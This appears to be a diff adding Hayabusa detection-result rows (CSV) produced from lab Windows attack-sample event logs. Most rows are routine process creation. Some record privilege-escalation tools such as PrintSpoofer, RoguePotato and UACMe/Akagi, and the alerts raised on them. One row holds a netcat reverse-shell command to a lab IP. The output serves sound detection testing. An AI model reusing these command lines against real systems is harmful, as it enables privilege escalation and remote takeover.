+2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: sihost.exe  :  Path: C:\Windows\System32\sihost.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService  :  Path: C:\Windows\System32\svchost.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe  :  Path: C:\Windows\System32\userinit.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications  :  Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 318 0000021FF2606500  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Discovery - domain time  :  Command: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0  :  Path: C:\BGinfo\BGINFO.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\SecurityHealthService.exe  :  Path: C:\Windows\System32\SecurityHealthService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding  :  Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background  :  Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe""   :  Path: C:\Windows\regedit.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 258 0000021FF266EC20  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe""   :  Path: C:\Windows\regedit.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PrintSpoofer.exe  -i -c powershell.exe  :  Path: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: powershell.exe  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: PrintSpoofer.exe  -i -c powershell.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe""  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: powershell.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\ChangePk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx
+2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: NetworkServiceExploit.exe  -i -c ""c:\Windows\System32\cmd.exe""  :  Path: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: NetworkServiceExploit.exe  -i -c ""c:\Windows\System32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RoguePotato.exe  -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999  :  Path: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe  :  Path: C:\Users\IEUser\Tools\Misc\nc64.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: RoguePotato.exe  -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Akagi.exe  58 c:\Windows\System32\cmd.exe  :  Path: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 328 310 0000028A37652590  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386  :  Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
+2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
+2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
+2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
+2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RogueWinRM.exe  -p c:\Windows\System32\cmd.exe  :  Path: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: RogueWinRM.exe  -p c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
